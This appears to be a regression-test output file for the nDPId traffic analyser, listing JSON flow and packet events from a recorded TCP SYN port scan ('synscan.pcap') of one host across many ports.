+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_packet_id":1,"flow_last_seen":1278275060701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060701,"pkt":"ACYLMQczACWzv5HuCABFAAAsVaQAADQGvs6sEAAIQA2GNIzS0x3dUoMYAAAAAGACBABhcQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_packet_id":1,"flow_last_seen":1278275060743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060743,"pkt":"ACYLMQczACWzv5HuCABFAAAs3tQAACgGQZ6sEAAIQA2GNIzTwBfdU4MZAAAAAGACBAB0dAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsp9QAACoGdp6sEAAIQA2GNIzTH5HdU4MZAAAAAGACDAAM+wAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAssgkAAC4GaGmsEAAIQA2GNIzTzcHdU4MZAAAAAGACDABeygAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsOvEAACYG54GsEAAIQA2GNIzTG1zdU4MZAAAAAGACDAARMAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzcAACwGtTusEAAIQA2GNIzTatjdU4MZAAAAAGACBADJswAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs9\/IAADoGFoCsEAAIQA2GNIzTHRPdU4MZAAAAAGACDAAPeQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsc2kAAC4GpwmsEAAIQA2GNIzTE4zdU4MZAAAAAGACDAAZAAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1510,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsV7wAADIGvrasEAAIQA2GNIzTCpbdU4MZAAAAAGACDAAh9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs1zgAADUGPDqsEAAIQA2GNIzTCbzdU4MZAAAAAGACCAAm0AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1512,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsUiMAADkGvU+sEAAIQA2GNIzTA+jdU4MZAAAAAGACCAAspAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fMAADAGGn+sEAAIQA2GNIzTDMXdU4MZAAAAAGACBAAnxwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAskBMAACkGj1+sEAAIQA2GNIzTB9fdU4MZAAAAAGACCAAotQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsfuEAADkGkJGsEAAIQA2GNIzTGaXdU4MZAAAAAGACCAAW5wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zgAACwGHTqsEAAIQA2GNIzTDzHdU4MZAAAAAGACBAAlWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsSNkAADcGyJmsEAAIQA2GNIzSBFndUoMYAAAAAGACEAAkNgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsMkkAACkG7SmsEAAIQA2GNIzSD5LdUoMYAAAAAGACCAAg\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsmhQAACcGh16sEAAIQA2GNIzSIPvdUoMYAAAAAGACEAAHlAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsTp0AACcG0tWsEAAIQA2GNIzSBB7dUoMYAAAAAGACEAAkcQAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAssqIAACgGbdCsEAAIQA2GNIzSVEPdUoMYAAAAAGACBADgSwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAs7IIAAC4GLfCsEAAIQA2GNIzSFz7dUoMYAAAAAGACDAAVUQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsgF8AADEGlxOsEAAIQA2GNIzSI4zdUoMYAAAAAGACCAANAwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsiDYAADsGhTysEAAIQA2GNIzSwPjdUoMYAAAAAGACEABnlgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsHRgAADcG9FqsEAAIQA2GNIzSBGrdUoMYAAAAAGACEAAkJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsbK4AACcGtMSsEAAIQA2GNIzSCzvdUoMYAAAAAGACEAAdVAAAAgQFtA=="} 
